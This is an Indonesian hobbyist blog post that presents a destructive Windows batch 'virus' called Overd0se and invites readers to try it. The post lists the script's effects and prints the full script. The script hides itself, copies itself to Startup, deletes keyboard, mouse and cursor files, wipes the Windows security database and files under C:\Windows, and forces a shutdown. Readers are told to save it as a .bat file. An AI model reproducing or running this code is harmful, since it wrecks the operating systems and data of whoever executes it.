Blog e arek Mblitar..
ISLAM CORNER | HANDPHONE | WINDOWS TRICK | SEO | SOFTWARE | VIRUS | ISENG | CBOX TRICK | CSS TUTORIAL | HACKING | BLOGGING TIPS | INTERNET | HTML TUTORIAL |

Virus Overdosis

Jalan-jalan di Blog Hacker emang seru, Kali ini ketemu sama virus lagi nih, virusnya sih dikasih nama Overd0se, sesuai dengan nama pembuatnya. Virus ini klo saya bilang sangat berbahaya, ya coba aja kalian eksekusi di komputer kalian maka kalian bisa katakan ”Good Bye My Windows!”, hhhaa Emang gag tanggung-tanggung, si pembuat virus Overd0se ini memberikan efek yang mantep. Lihat aja daftar kegitan virus ini bila dieksekusi :
  1. Tidak terditeksi Task manager
  2. Mengcopy diri ke Start Up
  3. Mendisable Keyboard dan Mouse
  4. Menciptakan banyak folder pada Desktop dan di C drive
  5. Menghapus / security / database
  6. Menonaktifkan cursors
  7. Menghapus Windows
  8. Terakhir Virus ini akan mematikan komputer kalian.
Gimana mantep gag tuh. Klo mau coba silahkan copast script dibawah ini
@echo OFF
title Your computer is fucked LOL
attrib +s +h %0
copy %0 "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\start Menu\Programs\startup"
cd C:\Windows\system32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
mkdir C:\Users\%username\Desktop\HELLO GOOD SIR YOUR COMPUTER IS IN THE PROCESS OF BEING FUCKED, PLEASE ENJOY READING THESE FOLDERS ONE BY ONE AS YOU CANT USE YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY HAVING THE REST OF YOUR COMPUTER GET FUCKED RESTARTING YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN
echo CHECK YOUR DESKTOP
ping localhost >nul
mkdir C:\HOLY FUCK MAKING FOLDERS IS FUN. WELL FUN FOR ME, NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS FITS!
echo CHECK YOUR C DRIVE
echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL
ping localhost >nul
echo Y | del C:\Windows\security\Database
cd C:\Windows\Cursors
del /S /F /Q *.cur
del /S /F /Q *.ani
echo OH NO WHERE THE FUCK DID YOUR CURSOR GO
ping localhost >nul
cls
echo Y | del /f /q "C:\Windows\*"
shutdown -s -t 4 -c "Sorry, but you're fucked"
exit
Simpan di Notepad kemudian save dengan ekstensi .bat

1 comments:

herizal alwi said...

Lumayan gan
:)

TULIS KOMENTAR ANDA..!!

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by Blogger